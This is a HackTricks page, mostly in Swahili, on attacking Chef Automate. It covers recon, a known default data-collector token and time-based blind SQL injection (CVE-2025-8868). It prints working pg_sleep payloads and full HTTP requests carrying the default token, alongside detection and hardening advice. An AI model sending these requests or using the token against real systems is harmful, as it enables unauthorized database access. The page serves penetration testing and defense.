HackTricks CloudChef Automate Enumeration & Attacks
Reading time: 6 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Overview
Ukurasa huu unakusanya mbinu za vitendo za ku-enumerate na kushambulia instances za Chef Automate, kwa msisitizo kwenye:
- Discovering gRPC-Gateway-backed REST endpoints and inferring request schemas via validation/error responses
- Abusing the x-data-collector-token authentication header when defaults are present
- Time-based blind SQL injection in the Compliance API (CVE-2025-8868) affecting the filters[].type field in /api/v0/compliance/profiles/search
Kumbuka: Majibu ya backend ambayo yanajumuisha header grpc-metadata-content-type: application/grpc kwa kawaida yanaonyesha gRPC-Gateway inayounganisha simu za REST kwenda services za gRPC.
Recon: Architecture and Fingerprints
- Front-end: Often Angular. Static bundles can hint at REST paths (e.g., /api/v0/...)
- API transport: REST to gRPC via gRPC-Gateway
- Responses may include grpc-metadata-content-type: application/grpc
- Database/driver fingerprints:
- Error bodies starting with pq: strongly suggest PostgreSQL with the Go pq driver
- Interesting Compliance endpoints (auth required):
- POST /api/v0/compliance/profiles/search
- POST /api/v0/compliance/scanner/jobs/search
Auth: Data Collector Token (x-data-collector-token)
Chef Automate exposes a data collector that authenticates requests via a dedicated header:
- Header: x-data-collector-token
- Risk: Some environments may retain a default token granting access to protected API routes. Known default observed in the wild:
- 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506
Ikiwa ipo, token hii inaweza kutumika kupiga endpoints za Compliance API ambazo vinginevyo zinahitaji auth. Daima jaribu ku-rotate/disable defaults wakati wa hardening.
API Schema Inference via Error-Driven Discovery
gRPC-Gateway-backed endpoints often leak useful validation errors that describe the expected request model.
For /api/v0/compliance/profiles/search, the backend expects a body with a filters array, where each element is an object with:
- type: string (filter field identifier)
- values: array of strings
Example request shape:
{
"filters": [
{ "type": "name", "values": ["test"] }
]
}
JSON isiyo sahihi au aina za fields zisizofaa kawaida husababisha majibu ya 4xx/5xx yenye vidokezo, na headers zinaonyesha tabia ya gRPC-Gateway. Tumia haya kupanga fields na kutambua injection surfaces.
API ya Compliance SQL Injection (CVE-2025-8868)
- Endpoint iliyoathirika: POST /api/v0/compliance/profiles/search
- Injection point: filters[].type
- Aina ya udhaifu: time-based blind SQL injection in PostgreSQL
- Sababu ya msingi: Ukosefu wa parameterization/whitelisting sahihi wakati wa kuingiza field ya type ndani ya fragment ya dynamic SQL (labda kutumika kujenga identifiers/WHERE clauses). Maadili yaliyoundwa katika type yanatekelezwa na PostgreSQL.
Working time-based payload:
{"filters":[{"type":"name'||(SELECT pg_sleep(5))||'","values":["test"]}]}
Vidokezo vya mbinu:
- Funga string ya asili kwa alama ya nukta moja (')
- Unganisha subquery ambayo inaita pg_sleep(N)
- Rudi kwenye muktadha wa string kwa kutumia || ili SQL ya mwisho ibaki kuwa syntactically valid bila kujali wapi type imewekwa
Uthibitisho kupitia utofauti wa latency
Tuma paired requests na linganisha response times ili kuthibitisha server-side execution:
- N = 1 sekunde
POST /api/v0/compliance/profiles/search HTTP/1.1
Host: <target>
Content-Type: application/json
x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506
{"filters":[{"type":"name'||(SELECT pg_sleep(1))||'","values":["test"]}]}
- N = 5 sekunde
POST /api/v0/compliance/profiles/search HTTP/1.1
Host: <target>
Content-Type: application/json
x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506
{"filters":[{"type":"name'||(SELECT pg_sleep(5))||'","values":["test"]}]}
Observed behavior:
- Muda wa majibu huongezeka kwa pg_sleep(N)
- Majibu ya HTTP 500 yanaweza kujumuisha maelezo ya pq: wakati wa kupima, yakithibitisha njia za utekelezaji wa SQL
Vidokezo: Tumia validator wa muda (mfano, majaribio mengi kwa kulinganisha kwa takwimu) ili kupunguza kelele na matokeo chanya za uwongo.
Athari
Watumiaji walioidhinishwa—au wahusika wasioidhinishwa wakitumia x-data-collector-token ya default—wanaweza kutekeleza SQL yoyote ndani ya muktadha wa PostgreSQL wa Chef Automate, wakihatarisha usiri na uadilifu wa compliance profiles, usanidi, na telemetry.
Toleo zilizoathirika / Rekebisho
- CVE: CVE-2025-8868
- Mwongozo wa kusasisha: Chef Automate 4.13.295 au baadaye (Linux x86) kulingana na taarifa za muuzaji
Utambuzi na Forensiki
- API layer:
- Monitor 500s on /api/v0/compliance/profiles/search where filters[].type contains quotes ('), concatenation (||), or function references like pg_sleep
- Inspect response headers for grpc-metadata-content-type to identify gRPC-Gateway flows
- Database layer (PostgreSQL):
- Audit for pg_sleep calls and malformed identifier errors (often surfaced with pq: prefixes coming from the Go pq driver)
- Authentication:
- Rekodi na toa tahadhari kuhusu matumizi ya x-data-collector-token, hasa thamani za default zinazojulikana, katika njia za API
Kupunguza Hatari na Kuimarisha
- Mara ya haraka:
- Zungusha/zimia token za default za data collector
- Zuia ingress kwa endpoints za data collector; lazima token zenye nguvu na za kipekee
- Kiwango cha msimbo:
- Parameterize queries; kamwe usichanganye sehemu za SQL kwa string-concatenation
- Weka whitelist kali ya thamani za type zinazoruhusiwa kwenye server (enum)
- Epuka kujenga SQL kwa njia ya dynamic kwa identifiers/clauses; ikiwa tabia ya dynamic inahitajika, tumia kunukuu salama kwa identifier na whitelists wazi
Orodha ya Ukaguzi ya Kupima Kivitendo
- Angalia kama x-data-collector-token inakubaliwa na kama default inayojulikana inafanya kazi
- Panga ramani ya schema ya Compliance API kwa kusababisha makosa ya uthibitishaji na kusoma ujumbe wa kosa/headers
- Jaribu kwa SQLi kwenye fields zisizo wazi “identifier-like” (mfano, filters[].type), siyo tu arrays za values au fields za maandishi ya ngazi ya juu
- Tumia mbinu za muda (time-based) kwa concatenation ili SQL ibaki sarufi sahihi katika muktadha tofauti
Marejeo
- Cooking an SQL Injection Vulnerability in Chef Automate (XBOW blog)
- Timing trace (XBOW)
- CVE-2025-8868
- gRPC-Gateway
- pq PostgreSQL driver for Go
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.